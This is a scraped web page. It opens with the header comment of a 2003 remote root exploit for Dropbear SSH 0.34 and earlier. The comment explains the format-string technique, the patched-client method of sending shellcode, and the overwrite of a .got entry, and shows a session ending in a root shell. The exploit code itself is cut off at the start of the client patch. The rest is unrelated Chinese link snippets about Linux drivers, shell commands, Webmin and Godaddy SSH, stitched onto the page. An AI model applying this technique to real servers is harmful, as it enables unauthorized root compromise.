Linux x86 Dropbear SSH <= 0.34 remote root exploit
/*
* /*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
*
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
*
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by 127.0.0.1
*
* % telnet localhost 10275
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
*
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
*
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
*
* gr33tz: ppro, alcaloide and friends.
*
* 21.08.2003
* Please do not distribute
*/
/*
--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000
相关文档:
7.5. Tasklets 机制
上一页
第 7 章 时间, 延时, 和延后工作
下一页
http://lsec.cc.ac.cn/~tengfei/doc/ldd3/index.html
Linux 设备驱动 Edition 3
7.5. Tasklets 机制
另一个有关于定时问题的内核设施是 tasklet 机制. 它大部分用在中断管理(我们将在第 10 章再次见到). ......
键盘在所有的驱动之中最为简单的一种,但它却包含了驱动的基本框架,对以后继续深入学习其他复杂的驱动大有裨益,以下便为你逐步剖析驱动的开发。采用的是查询方式。转载请注明出处:qiangren.blog.edu.cn
一.内核模块的注册和撤销
在加载模块的时候,首先运行的是内核模块的注册函数。它的功能包括内核注册设备以 ......
source命令(从 C Shell 而来)是bash shell的内置命令。点命令,就是一个点符号,(从Bourne Shell而来)是source的另一名称。这两个命令都以一个脚本为参数,该脚本将作为当前shell的环境执行,即不会启动一个新的子进程。所有在脚本中设置的变量将成为当前Shell的一部分。同样的,当前脚本中设置的变量也将作为脚本的环境,s ......
1)webmin
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前
Webmin支持绝大多数的Unix系统,这些系统除了各种版本的linux以外还包括:AIX、HPUX、Solaris、Unixware、Irix
和FreeBSD等。
Webmin 让您能 ......
以前Godaddy的Linux的主机是不能开通SSH的,只有VDS、VPS、独立主机可以开通,前几天在后台上看到有了SSH这个功能,不过需要删除所有的数据库,才可以进行开通的步骤。强烈建议备份数据库及网站!!
删除数据库就不用说了~很简单。
步骤:进入空间管理面板,选择Settings选项卡下的SSH选项,如下图:
godaddyssh-thumb. ......